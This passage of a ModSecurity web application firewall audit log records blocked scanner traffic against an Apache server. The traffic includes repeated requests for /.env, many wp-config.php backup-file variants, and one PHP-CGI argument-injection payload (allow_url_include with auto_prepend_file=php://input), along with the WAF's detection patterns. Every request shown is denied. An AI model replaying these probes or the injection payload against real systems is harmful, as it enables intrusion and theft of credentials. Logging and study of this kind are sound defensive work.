Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1
Accept-Charset: utf-8
--f69b4716-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f69b4716-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744914350646214 891 (- - -)
Stopwatch2: 1744914350646214 891; combined=446, p1=403, p2=0, p3=0, p4=0, p5=42, sr=133, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f69b4716-Z--
--781d6235-A--
[18/Apr/2025:01:28:45 +0700] aAFIXZttSyr0uJld9k7RiAAAAMY 103.236.140.4 53238 103.236.140.4 8181
--781d6235-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept-Charset: utf-8
--781d6235-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--781d6235-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744914525935663 877 (- - -)
Stopwatch2: 1744914525935663 877; combined=413, p1=358, p2=0, p3=0, p4=0, p5=55, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--781d6235-Z--
--71dbe304-A--
[18/Apr/2025:01:51:38 +0700] aAFNut9Bm7jS0aoVS7JXewAAAIQ 103.236.140.4 45024 103.236.140.4 8181
--71dbe304-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 47.96.10.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 47.96.10.143
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
--71dbe304-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--71dbe304-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744915898580581 913 (- - -)
Stopwatch2: 1744915898580581 913; combined=330, p1=287, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--71dbe304-Z--
--7b1c4f14-A--
[18/Apr/2025:03:04:14 +0700] aAFevj2cuLCXMl1vWbDFlAAAAA8 103.236.140.4 56994 103.236.140.4 8181
--7b1c4f14-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36
Accept-Charset: utf-8
--7b1c4f14-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7b1c4f14-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744920254974630 747 (- - -)
Stopwatch2: 1744920254974630 747; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7b1c4f14-Z--
--394ba828-A--
[18/Apr/2025:03:16:33 +0700] aAFhoT2cuLCXMl1vWbDIwgAAAAI 103.236.140.4 39924 103.236.140.4 8181
--394ba828-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--394ba828-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--394ba828-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744920993756490 774 (- - -)
Stopwatch2: 1744920993756490 774; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--394ba828-Z--
--a6c58847-A--
[18/Apr/2025:04:29:14 +0700] aAFyqhk6uTiIdxrJEESvSAAAANc 103.236.140.4 41400 103.236.140.4 8181
--a6c58847-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.253.92.249
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.253.92.249
X-Forwarded-Proto: https
Connection: close
Content-Length: 28
content-type: application/dns-message
accept: application/dns-message
user-agent: Chrome
--a6c58847-C--
â³ googlecom
--a6c58847-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6c58847-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744925354939255 12852 (- - -)
Stopwatch2: 1744925354939255 12852; combined=10877, p1=1749, p2=8657, p3=160, p4=257, p5=54, sr=86, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6c58847-Z--
--0dc99d7e-A--
[18/Apr/2025:04:48:55 +0700] aAF3R1yj-eUTITfvHEUYmgAAABg 103.236.140.4 45710 103.236.140.4 8181
--0dc99d7e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 209.38.95.9
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 209.38.95.9
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--0dc99d7e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0dc99d7e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744926535257930 932 (- - -)
Stopwatch2: 1744926535257930 932; combined=440, p1=400, p2=0, p3=0, p4=0, p5=40, sr=129, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0dc99d7e-Z--
--addd331d-A--
[18/Apr/2025:06:45:56 +0700] aAGStDpR4B6O-aqWibPN9QAAAIw 103.236.140.4 43172 103.236.140.4 8181
--addd331d-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.10.250.218
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.10.250.218
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--addd331d-C--
--addd331d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--addd331d-E--
--addd331d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744933556156906 6614 (- - -)
Stopwatch2: 1744933556156906 6614; combined=5022, p1=485, p2=4502, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--addd331d-Z--
--e171c35c-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDAAAAEo 103.236.140.4 52328 103.236.140.4 8181
--e171c35c-B--
GET /wp-config.php_ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
--e171c35c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e171c35c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778628850 834 (- - -)
Stopwatch2: 1744935778628850 834; combined=302, p1=263, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e171c35c-Z--
--5e3bad27-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDQAAAEU 103.236.140.4 52330 103.236.140.4 8181
--5e3bad27-B--
GET /wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: */*
--5e3bad27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e3bad27-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778661461 655 (- - -)
Stopwatch2: 1744935778661461 655; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e3bad27-Z--
--bf0beb65-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDgAAAE0 103.236.140.4 52332 103.236.140.4 8181
--bf0beb65-B--
GET /wp-config.php~ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
--bf0beb65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bf0beb65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778693344 722 (- - -)
Stopwatch2: 1744935778693344 722; combined=304, p1=273, p2=0, p3=0, p4=0, p5=31, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bf0beb65-Z--
--5ff0341d-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDwAAAE8 103.236.140.4 52334 103.236.140.4 8181
--5ff0341d-B--
GET /wp-config.php.war HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Accept: */*
--5ff0341d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5ff0341d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778729379 703 (- - -)
Stopwatch2: 1744935778729379 703; combined=292, p1=261, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5ff0341d-Z--
--47029344-A--
[18/Apr/2025:07:22:58 +0700] aAGbYlyj-eUTITfvHEUkBwAAAAc 103.236.140.4 52336 103.236.140.4 8181
--47029344-B--
GET /wp-config.php.tar HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36
Accept: */*
--47029344-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47029344-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778765035 728 (- - -)
Stopwatch2: 1744935778765035 728; combined=301, p1=268, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47029344-Z--
--927bb068-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEAAAAFM 103.236.140.4 52338 103.236.140.4 8181
--927bb068-B--
GET /wp-config.php.saved HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/7.1.2 Safari/537.85.11
Accept: */*
--927bb068-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--927bb068-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778802788 667 (- - -)
Stopwatch2: 1744935778802788 667; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--927bb068-Z--
--fa9e7608-A--
[18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4jwAAAM4 103.236.140.4 52340 103.236.140.4 8181
--fa9e7608-B--
GET /wp-config.inc HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Accept: */*
--fa9e7608-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa9e7608-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744935778837759 2017 (- - -)
Stopwatch2: 1744935778837759 2017; combined=793, p1=328, p2=439, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa9e7608-Z--
--22b4eb01-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQOwAAAJQ 103.236.140.4 52346 103.236.140.4 8181
--22b4eb01-B--
GET /wp-config.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5
Accept: */*
--22b4eb01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--22b4eb01-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778876263 787 (- - -)
Stopwatch2: 1744935778876263 787; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--22b4eb01-Z--
--5c0ccd3f-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEQAAAEk 103.236.140.4 52348 103.236.140.4 8181
--5c0ccd3f-B--
GET /wp-config.php.tmp HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Accept: */*
--5c0ccd3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c0ccd3f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778907492 853 (- - -)
Stopwatch2: 1744935778907492 853; combined=384, p1=347, p2=0, p3=0, p4=0, p5=37, sr=131, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c0ccd3f-Z--
--56694960-A--
[18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQPAAAAJA 103.236.140.4 52350 103.236.140.4 8181
--56694960-B--
GET /wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
--56694960-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56694960-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778943730 642 (- - -)
Stopwatch2: 1744935778943730 642; combined=252, p1=220, p2=0, p3=0, p4=0, p5=31, sr=69, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56694960-Z--
--872cae09-A--
[18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4kAAAAM0 103.236.140.4 52352 103.236.140.4 8181
--872cae09-B--
GET /wp-config.php.save HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: */*
--872cae09-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--872cae09-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935778974864 662 (- - -)
Stopwatch2: 1744935778974864 662; combined=267, p1=221, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
